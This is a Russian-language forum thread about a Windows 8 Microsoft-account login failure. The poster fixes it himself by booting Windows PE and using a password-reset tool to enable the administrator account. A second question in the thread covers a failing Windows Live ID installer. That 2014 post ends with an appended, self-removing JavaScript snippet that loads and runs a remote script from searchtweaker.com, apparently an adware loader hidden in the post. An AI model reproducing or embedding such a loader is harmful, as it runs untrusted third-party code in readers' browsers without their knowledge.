PDA

Показать полную графическую версию : Проблема авторизации с LiveID, Win8


DiT
08-11-2013, 23:21
Добрый день! Прошу помочь, не знаю как решить проблему.
На ноутбуке Lenovo z500 была настроены локальная учетная запись, все работало нормально. (ОС Win8 или Win8.1, сейчас точно не скажу) Потом решили объединить её с учетной записью Microsoft и получилась проблема, после перезагрузки при попытке зайти в систему под учётной записью user@live.ru введя верный пароль(на live.com заходит с другого компьютера) выдается следующее сообщение:
Неправильный пароль. Убедитесь, что вы используете пароль для своей учетной записи Майкрософт. Вы всегда можете сбросить его на account.live.com/password/reset.

Пробовал менять пароль - все равно не подходит. Думал, что проблема с доступом в интернет - подключается к нескольким wifi сетям, прямым проводом, все равно не принимает. Хотел добраться до восстановления системы - при запуске ОС Диагностика-Дополнительные параметры, там есть и восстановление системы, и командная строка(что бы как в Win7 включить локального админа), и параметры загрузки для выбора Безопасного режима, но везде для продолжения предлагает выбрать учетную запись, которая уже имеет админские права на компе(т.е. LiveID, пароль от которого не принимается) .
Загрузку с внешнего устройства, LiveCD не пробовал, нет пока возможности.

Какие могут быть варианты восстановления доступа к системе без перестановки?

Petunchicus
09-11-2013, 12:17
DiT, Забытый пароль и другие проблемы при входе (http://windows.microsoft.com/ru-ru/windows-live/sign-in-cant).

DiT
09-11-2013, 23:33
Запустите средство исправления неполадок с учетными записями МайкрософтЯ не могу войти в систему дальше ввода пароля
Вход на другом компьютере, Войдите на другие сайты и в другие службы Майкрософт
На другой комп под данным LiveID вхожу без проблема, на сервисы Microsoft тоже
Проверьте брандмауэр и антивирусные программыНе могу выполнить это действие, нужно войти в систему
сброс пароля
не помогает

anderson-7
09-11-2013, 23:50
вводите не live.ru а microsoft.com а остальное так же

DiT
10-11-2013, 13:44
anderson-7, как при входе в систему сменить пользователя? У меня ноутбук запрашивает только пароль к учетке, которая на нем настроена, т.е. User@live.ru

anderson-7
10-11-2013, 14:21
Попробуйте ломануться на сайт live.ru через интернет эксплоэр со своей учеткой. Пустит будем думать дальше, и не забытьсохранить пароль в эксплоэре. Не пустит, ломанитесь, на microsoft.com через эксплоэр. Тогда уже видно будет, в какую сторону идти.

DiT
10-11-2013, 16:23
anderson-7, я уже писал, что на майкрософтовские сервиса с других устройств без проблем захожу под этой учеткой

DiT
11-11-2013, 09:26
Добрался до флешки, накатил на неё образ Windows 8.1, попытался с помощью неё получить доступ к реестру, восстановлению системы. Не вышло, говорит - "диск на котором установлена система windows заблокирован". Редактор реестра запускается, через проводник вижу файлы и папки, подключить реестр установленной винды не выходит. Пункт меню есть, но при его нажатии ничего не происходит. Создал загрузочный Windows PE, загрузился с него, там стороннюю запустил утилиту сброса пароля, включил учётную запись администратора. Всё, получил доступ к системе, вошёл под администратором!
sfc /scannow ошибок не нашёл. Уже небыло времени дальше заниматься этим вопросом, ноутбук нужен был к утру понедельника, создал новую локальную учётную запись, перенёс документы и нужные настройки из user@live.ru

SILVER-SONIC
04-08-2014, 14:20
Доброго дня!
Устанавливаю пакет Windows Live ID 6.5 64 на windows-е 8.1 64, при запуске выходит окно и сразу закрывается, после этого ничего не происходит.
В чем может быть подвох?.(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

ruslan...
04-08-2014, 16:21
SILVER-SONIC,

1. Откройте командную строку с Административными правами (http://www.oszone.net/10594#100).
2. В командной строке введите следующую команду и нажмите клавишу ВВОД: sfc /scannow
Если в конце проверки выйдет сообщение, что не все файлы удалось восстановить,
подкрепите к сообщению C:\windows\Logs\CBS\CBS.log в архиве.
Если файлы будут восстановлены, перезагрузитесь и проверьте наличие проблемы.




© OSzone.net 2001-2012